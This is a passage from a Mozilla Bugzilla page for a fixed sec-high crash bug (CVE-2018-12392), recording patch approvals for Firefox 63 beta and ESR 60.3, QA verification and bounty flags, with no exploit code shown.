Closed: 6 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla64
|
|
||
Comment 21•6 years ago
|
||
Comment on attachment 9012513 [details] [diff] [review]
dont_unsupress_during_document_open.diff
Approved for 63.0b14. Will also approve for ESR 60.3 once the patch gets r+.
Attachment #9012513 -
Flags: approval-mozilla-beta? → approval-mozilla-beta+
|
|
||
Comment 22•6 years ago
|
||
| uplift | ||
|
||
Updated•6 years ago
|
Flags: qe-verify+
Whiteboard: [post-critsmash-triage]
|
|
||
Updated•6 years ago
|
Attachment #9015291 -
Flags: review?(peterv) → review+
|
|
||
Comment 23•6 years ago
|
||
Comment on attachment 9015291 [details] [diff] [review]
dont_unsupress_during_document_open_esr60.diff
Fixes a sec-high, approved for ESR 60.3.
Attachment #9015291 -
Flags: approval-mozilla-esr60+
|
|
||
Comment 24•6 years ago
|
||
| uplift | ||
|
||
Comment 25•6 years ago
|
||
Verified, that the crash is no longer reproducible using the attached testcases, on latest Nightly 64 (asan and debug), latest Beta 63(asan and non-asan) and latest ESR from https://tools.taskcluster.net/index/gecko.v2.mozilla-esr60.latest.firefox
Status: RESOLVED → VERIFIED
Flags: qe-verify+
|
|
||
Updated•6 years ago
|
Whiteboard: [post-critsmash-triage] → [post-critsmash-triage][adv-main63+][adv-esr60.3+]
|
|
||
Updated•6 years ago
|
Alias: CVE-2018-12392
|
|
||
Updated•6 years ago
|
Flags: sec-bounty?
|
||
Updated•6 years ago
|
Flags: sec-bounty? → sec-bounty+
|
||
Updated•6 years ago
|
Component: DOM → DOM: Core & HTML
|
|
||
Updated•5 years ago
|
Group: core-security-release
|
||
Updated•9 months ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•